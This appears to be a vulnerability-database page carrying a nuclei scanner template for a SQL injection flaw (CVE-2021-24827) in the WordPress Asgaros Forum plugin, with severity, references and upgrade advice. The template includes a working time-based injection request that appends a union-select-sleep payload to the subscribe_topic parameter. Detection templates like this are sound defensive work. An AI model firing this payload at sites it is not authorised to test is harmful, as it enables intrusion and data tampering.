Lucene search
K

WordPress Asgaros Forum <1.15.13 - SQL Injection

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 45 Views

WordPress Asgaros Forum plugin <1.15.13 - SQL Injection. Allows unauthorized access, data manipulation

Related
Refs
Code
id: CVE-2021-24827

info:
  name: WordPress Asgaros Forum <1.15.13 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation.
  remediation: |
    Upgrade to the latest version of Asgaros Forum (1.15.13 or higher) to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1
    - https://wordpress.org/plugins/asgaros-forum/
    - https://plugins.trac.wordpress.org/changeset/2611560/asgaros-forum
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24827
    - https://github.com/20142995/sectool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24827
    cwe-id: CWE-89
    epss-score: 0.13285
    epss-percentile: 0.95925
    cpe: cpe:2.3:a:asgaros:asgaros_forum:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: asgaros
    product: asgaros_forum
    framework: wordpress
  tags: time-based-sqli,cve2021,cve,wp-plugin,asgaros-forum,unauth,wpscan,wordpress,wp,sqli,asgaros,vkev,vuln

http:
  - raw:
      - |
        @timeout: 15s
        GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "asgarosforum")'
        condition: and
# digest: 4a0a0047304502203581de7c2ad49386e1f09aa03c76faf8816ba0db485f571ea07692f12d91f2580221009684af120a75c772f05dc36a2e6fbdee2c9580bb04ddb3fb6371dff4590eab9e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 27.5
CVSS 3.19.8
EPSS0.13285
45